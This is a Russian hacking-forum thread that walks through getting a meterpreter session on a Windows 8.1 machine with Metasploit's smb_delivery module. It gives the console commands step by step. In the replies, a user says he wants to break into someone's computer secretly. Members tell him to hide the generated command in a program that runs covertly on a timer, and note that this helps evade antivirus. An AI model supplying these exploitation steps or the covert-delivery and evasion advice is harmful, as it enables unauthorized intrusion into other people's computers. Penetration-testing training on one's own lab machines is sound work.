Взлом удаленного хоста (SMB Delivery Exploit)

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем Vander, 1 ноя 2016.

  1. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Репутация:
    3
    Регистрация:
    16 янв 2016
    Сообщения:
    833
    Симпатии:
    1.656
    Всем привет! В этой небольшой статье я хочу показать очередной способ получения сессии meterpreter посредством использования Metasploit Framework, а в частности эксплоита, который носит название SMB Delivery Exploit.

    Взлом удаленного хоста (SMB Delivery Exploit)

    В роли атакующей системы Kali Linux 2016.2 с адресом в локальной сети 192.168.0.102 и целевой хост – Windows 8.1. с адресом в локальной сети 192.168.0.103.

    Откроем терминал и запустим Metasploit Framework:

    > msfconsole

    В консоли фреймворка пишем:

    > use exploit/windows/smb/smb_delivery

    > set srvport 4444

    > set srvhost 192.168.0.102

    > exploit

    Взлом удаленного хоста (SMB Delivery Exploit)

    Теперь, как указывает эксплойт, нам необходимо запустить сгенерированную им команду в командной строке целевого хоста:

    Взлом удаленного хоста (SMB Delivery Exploit)

    После успешной отработки команды в консоли Linux видим формирование сессии meterpreter:

    Взлом удаленного хоста (SMB Delivery Exploit)

    Жмем Ctrl+C, и смотрим информацию о текущих сессиях:

    > sessions –i

    И подключаемся к открытой сессии под номером 1:

    > sessions –I 1

    Взлом удаленного хоста (SMB Delivery Exploit)

    В диспетчере задач Windows созданный процесс выглядит так:

    Взлом удаленного хоста (SMB Delivery Exploit)

    Снимаем задачу и сессия погибает:

    Взлом удаленного хоста (SMB Delivery Exploit)

    На этом собственно все. Спасибо за внимание.
     
    id2746, Toha, gx6060 и 2 другим нравится это.
  2. woweb

    woweb Гость

    Репутация:
    0
    Здесь вот што пишет смотрим скин... Взлом удаленного хоста (SMB Delivery Exploit)
     
  3. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Репутация:
    3
    Регистрация:
    16 янв 2016
    Сообщения:
    833
    Симпатии:
    1.656
    Перезагрузи систему, и попробуй другой порт, 4445 к примеру.
     
  4. woweb

    woweb Гость

    Репутация:
    0
    Щас попробую...я так изучал debian и самс...сцука не давался ни в какую...в итоге одолел...и щас у меня прокси сервер на debian + sams, кстати а не может быть причина что я сижу в данный момент через прокси, а комп за ее пределами...т.е. у меня айпи 192,168,121,77 а у него 192,168,178,97 ну понятно что точки там...лень было переключать клаву.
     
  5. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Репутация:
    3
    Регистрация:
    16 янв 2016
    Сообщения:
    833
    Симпатии:
    1.656
    Ну и в прокси файрволл, все дела... да? Закрытые порты наверное, кроме используемых...
     
  6. woweb

    woweb Гость

    Репутация:
    0
    Что то не пойму вот это выражение "Теперь, как указывает эксплойт, нам необходимо запустить сгенерированную им команду в командной строке целевого хоста:"
    То есть мне теперь нужно сесть за комп который я хочу тайно взломать чтоб запустить в строке команду...
    Ну ё-моё, нахрена мне тогда вообща эти мануалы...елси можно подойти и физически все повредить...к примеру толстой проволокой (лом её еще называют)...пару раз стукнуть и все дела...
    После двух перезагрузок вот что пишет в скрине... Взлом удаленного хоста (SMB Delivery Exploit)
    Поначалу просто долго висела потом я решил проверить ссесию...а ее нет
     
  7. woweb

    woweb Гость

    Репутация:
    0
    Ну я ничего не закрывал...если по умолчанию то да...щас попробую минуя прокси...перезагружусь за пределами экрана дфл
     
  8. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Репутация:
    3
    Регистрация:
    16 янв 2016
    Сообщения:
    833
    Симпатии:
    1.656
    Ну напиши программу, какую нить и иль скрипт, скинь на комп поставь время ее запуска, и чтобы она запустила скрытно эту команду в cmd. Нет, блин, такой программы, вломать все, с одноименной кнопкой по центру.
     
  9. woweb

    woweb Гость

    Репутация:
    0
    Накуя мне скидывать на комп что-то, подходить к нему...цель вообще не прикасаяс ко компу залезть в него
     
  10. woweb

    woweb Гость

    Репутация:
    0
    В общем этот вариант вообще беспонтовый, если тот мануал с кучей команд не работает плсю там задействованы все апи и атакующий и атакуемый...здесь только мы знаем что есть айпи атакуемого...но нигде никуда его не пихаем...то есть стоит в сторонке себе...а мы мозги делаем на своей машине...бля...как можно сломать другую машину копаясь только в своей...ведь по мануалу другой машины вообще в помине нет...только в начале сказано что якобы собирается акаковать что то с айпи таким то...и у все...все остальное происходит на своей машине ни касаясь чего либо другого...
    лядно всем удачи...как я понял тут разводилово...
    ну не может в три секунды сломаться комп...который даже на атаковался...
     
  11. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Репутация:
    3
    Регистрация:
    16 янв 2016
    Сообщения:
    833
    Симпатии:
    1.656
    Взлом удаленного хоста (SMB Delivery Exploit)
     
    Mixa, KeyVoN и paragon21 нравится это.
  12. avacs

    avacs New Member

    Репутация:
    0
    Регистрация:
    2 ноя 2016
    Сообщения:
    4
    Симпатии:
    5
  13. avacs

    avacs New Member

    Репутация:
    0
    Регистрация:
    2 ноя 2016
    Сообщения:
    4
    Симпатии:
    5
    Vander, благодарим за Ваш Труд и Терпение! Взлом удаленного хоста (SMB Delivery Exploit)
     
    Mixa, Scan и Vander нравится это.
  14. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Репутация:
    3
    Регистрация:
    16 янв 2016
    Сообщения:
    833
    Симпатии:
    1.656
    Scan нравится это.
  15. kot-gor

    kot-gor Well-Known Member
    Команда форума Grey Team

    Репутация:
    1
    Регистрация:
    7 сен 2016
    Сообщения:
    316
    Симпатии:
    302
    Всем привет.народ если вы ждете программу в которой тыкнул на кнопочку и вы зашли в чужой комп ..то смею вас разочаровать.Здесь обсуждают инструменты пентестинга,люди делятся своим опытом и знаниями в этой области,а вам подавай готовое решения из коробки..Иногда нужно включать голову,что бы применить тот или иной инструмент или связку их.Учите языки программирования ,данный метод легко встраивается в программное обеспечение, а если поставить таймер на сработку, то это усложнит обнаружения многими антивирусами. Vander статья зачетная!!!!
     
    woweb, cepgio и Vander нравится это.
  16. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Репутация:
    3
    Регистрация:
    16 янв 2016
    Сообщения:
    833
    Симпатии:
    1.656
    Да, обмен опытом - это наш главный приоритет. Отзыв очень исчерпывающий, добавить нечего, все так и есть. Спасибо!
     
  17. Enima

    Enima New Member

    Репутация:
    0
    Регистрация:
    29 сен 2016
    Сообщения:
    4
    Симпатии:
    4
    Зачет! проверил все работает!
     
  18. Enima

    Enima New Member

    Репутация:
    0
    Регистрация:
    29 сен 2016
    Сообщения:
    4
    Симпатии:
    4
    Мда.... товарищь вам наверное лучше набрать в яндексе "Программы для хакера" вот там как раз полно выдаст отличных программ с кнопкой "ВЗЛОМ" =) еще кстати есть сайты с кнопочкой ЗАРАБАТЫВАТЬ ДЕНЬГИ! и прям счетчик крутится с бабками))) рекомендую!
     
    Stavnik, kot-gor и Vander нравится это.
  19. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Репутация:
    3
    Регистрация:
    16 янв 2016
    Сообщения:
    833
    Симпатии:
    1.656
    :D
     
  20. woweb

    woweb Гость

    Репутация:
    0
    Совет самый дешевый товар в мире...тем более у тебя я его и не спрашивал...так что воспользуйстя своим сокровенным знанием заработывать копейки сам...
    А так всем кто адекватно ответил благодарен...
    kot-gor (у) тебе жму руку...если есть возможность поделиться инфой или какой книгой буду признателен!
     
Загрузка...

Поделиться этой страницей